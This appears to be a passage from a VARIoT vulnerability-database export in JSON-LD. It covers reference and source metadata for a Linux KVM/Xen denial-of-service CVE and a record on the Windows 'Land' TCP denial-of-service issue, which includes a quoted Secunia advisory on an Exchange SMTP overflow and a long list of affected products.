        "url": "https://access.redhat.com/security/cve/cve-2016-0728"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0774"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.19.0-41.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-wily/4.2.0-21.25~14.04.1"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "db": "BID",
        "id": "77524"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "PACKETSTORM",
        "id": "134827"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "db": "PACKETSTORM",
        "id": "135574"
      },
      {
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "db": "PACKETSTORM",
        "id": "134940"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "db": "BID",
        "id": "77524"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "PACKETSTORM",
        "id": "134827"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "db": "PACKETSTORM",
        "id": "135574"
      },
      {
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "db": "PACKETSTORM",
        "id": "134940"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "date": "2015-11-10T00:00:00",
        "db": "BID",
        "id": "77524"
      },
      {
        "date": "2015-11-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "date": "2015-12-16T03:30:58",
        "db": "PACKETSTORM",
        "id": "134827"
      },
      {
        "date": "2016-01-19T21:09:08",
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "date": "2015-12-17T16:46:11",
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "date": "2015-12-17T16:47:23",
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "date": "2016-02-03T02:40:34",
        "db": "PACKETSTORM",
        "id": "135574"
      },
      {
        "date": "2015-12-17T16:46:40",
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "date": "2015-12-17T22:13:17",
        "db": "PACKETSTORM",
        "id": "134940"
      },
      {
        "date": "2015-11-16T11:59:12.043000",
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-10-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "date": "2017-05-02T07:07:00",
        "db": "BID",
        "id": "77524"
      },
      {
        "date": "2016-07-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "date": "2023-10-10T15:15:09.550000",
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "db": "PACKETSTORM",
        "id": "135574"
      },
      {
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "db": "PACKETSTORM",
        "id": "134940"
      }
    ],
    "trust": 0.5
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  KVM Subsystem and  Xen Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Failure to Handle Exceptional Conditions",
    "sources": [
      {
        "db": "BID",
        "id": "77524"
      }
    ],
    "trust": 0.3
  }
}

var-200503-0010
Vulnerability from variot

Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the "Land" vulnerability (CVE-1999-0016). Microsoft Windows does not adequately validate IP options, allowing an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service. An attacker could take complete control of a vulnerable system. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.


Want a new IT Security job?

Vacant positions at Secunia: http://secunia.com/secunia_vacancies/


TITLE: Microsoft Exchange SMTP Service Extended Verb Request Buffer Overflow

SECUNIA ADVISORY ID: SA14920

VERIFY ADVISORY: http://secunia.com/advisories/14920/

CRITICAL: Highly critical

IMPACT: System access

WHERE:

From remote

SOFTWARE: Microsoft Exchange Server 2000 http://secunia.com/product/41/ Microsoft Exchange Server 2003 http://secunia.com/product/1828/

DESCRIPTION: ISS X-Force has reported a vulnerability in Microsoft Exchange Server, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in the SMTP service within the handling of a certain extended verb request. This can be exploited to cause a heap-based buffer overflow by connecting to the SMTP service and issuing a specially crafted command.

Successful exploitation allows execution of arbitrary code with the privileges of the SMTP service (by default "Local System"). Instead, this requires permissions usually only granted to other Exchange servers in a domain.

SOLUTION: Apply patches.

Microsoft Exchange 2000 Server (requires SP3): http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66

Microsoft Exchange Server 2003: http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267

Microsoft Exchange Server 2003 (requires SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC

The following versions are not affected: * Microsoft Exchange Server 5.5 SP4 * Microsoft Exchange Server 5.0 SP2

PROVIDED AND/OR DISCOVERED BY: Mark Dowd and Ben Layer, ISS X-Force.

ORIGINAL ADVISORY: MS05-021 (KB894549): http://www.microsoft.com/technet/security/Bulletin/MS05-021.mspx

ISS X-Force: http://xforce.iss.net/xforce/alerts/id/193


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200503-0010",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 2.4,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(itanium)"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "windows xp home sp1",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "2.1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.01"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.31"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2.5"
      },
      {
        "model": "ios aa",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.10"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2.6"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.0"
      },
      {
        "model": "windows xp professional",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt enterprise server sp4",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "3.0"
      },
      {
        "model": "windows server enterprise edition sp1 beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.34"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios f",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "ios bt",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.0.12"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows xp tablet pc edition sp1",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios ia",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.3"
      },
      {
        "model": "windows xp tablet pc edition",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "3.1"
      },
      {
        "model": "windows server enterprise edition sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.1.x"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.2"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.1"
      },
      {
        "model": "windows xp 64-bit edition",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "10.3.16"
      },
      {
        "model": "windows server enterprise edition itanium sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.38"
      },
      {
        "model": "windows server standard edition sp1 beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "netware",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "novell",
        "version": "4.1"
      },
      {
        "model": "windows server standard edition sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "2.0"
      },
      {
        "model": "windows xp media center edition",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.36"
      },
      {
        "model": "windows xp media center edition sp2",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "10.3"
      },
      {
        "model": "ios bt",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.0.17"
      },
      {
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "3.x"
      },
      {
        "model": "windows nt enterprise server sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition sp1 beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows nt enterprise server sp3",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.2.10"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.1.5"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "2.0.1"
      },
      {
        "model": "windows server web edition sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt enterprise server sp2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp tablet pc edition sp2",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server enterprise edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2.3"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "1.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.33"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "open desktop",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sco",
        "version": "3.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.1.6.1"
      },
      {
        "model": "ios ia",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.9"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.16"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.3.2"
      },
      {
        "model": "ios aa",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.0.17"
      },
      {
        "model": "windows server datacenter edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows nt enterprise server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "9.0"
      },
      {
        "model": "unixware",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sco",
        "version": "2.1"
      },
      {
        "model": "windows xp professional sp1",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2.2"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "ios a",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "10.3.19"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.1"
      },
      {
        "model": "ios f1",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.35"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "11.0"
      },
      {
        "model": "windows xp home",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "cmw+",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sco",
        "version": "3.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "4.0"
      },
      {
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.1"
      },
      {
        "model": "ios ca",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "windows xp media center edition sp1",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios/700",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.30"
      },
      {
        "model": "sunos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sun",
        "version": "4.1.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "95"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.2.10"
      },
      {
        "model": "catalyst supervisor software",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "29xx2.4.401"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.37"
      },
      {
        "model": "sunos u1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sun",
        "version": "4.1.3"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.24"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "atm switch",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "marconi",
        "version": "6.1.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.0.32"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp professional sp2",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home sp2",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catalyst supervisor software",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "29xx2.1.1102"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.2.1"
      },
      {
        "model": "windows xp 64-bit edition sp1",
        "scope": null,
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "open server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sco",
        "version": "5.0"
      },
      {
        "model": "windows xp 64-bit edition version sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2.8"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios p",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.2.9"
      },
      {
        "model": "atm switch",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "marconi",
        "version": "7.0.1"
      },
      {
        "model": "windows server datacenter edition sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.2.4"
      },
      {
        "model": "windows nt server sp4",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.1.6"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "bsdi",
        "version": "4.0.1"
      },
      {
        "model": "windows xp 64-bit edition version",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios ca",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "windows server datacenter edition itanium sp1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "netbsd",
        "version": "1.2"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "freebsd",
        "version": "2.1x"
      },
      {
        "model": "windows server web edition sp1 beta",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "10.30"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "sp2"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "modular messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "windows xp professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "x64"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "windows xp embedded sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp embedded",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "windows xp gold",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "windows server datacenter edition",
